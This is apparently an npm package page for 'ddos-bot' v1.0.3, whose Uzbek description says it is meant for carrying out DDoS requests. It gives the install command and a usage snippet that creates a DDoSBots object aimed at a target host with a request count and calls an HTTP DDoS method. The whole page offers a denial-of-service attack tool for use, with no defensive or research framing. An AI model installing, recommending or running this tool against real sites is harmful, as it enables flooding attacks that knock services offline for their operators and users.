1.0.3 • Published 2 years ago
ddos-bot v1.0.3
ddos-bot
Ddos so'rovlarini amalga oshirish uchun mo'ljallangan
Prerequisites
This project supports all versions of Node.js Node and NPM are really easy to install. To make sure you have them available on your machine, try running the following command.
$ npm i ddos-botTable of contents
Getting Started
Ddos so'rovlarini amalga oshirish mumkin bo'lgan paket
Installation
$ npm i ddos-botconst DDoSBots = require('ddos-bot'); // Paket nomi
const ddos = new DDoSBots('example.com', 100);
// HTTP DDoS hujumi
ddos.httpDdos();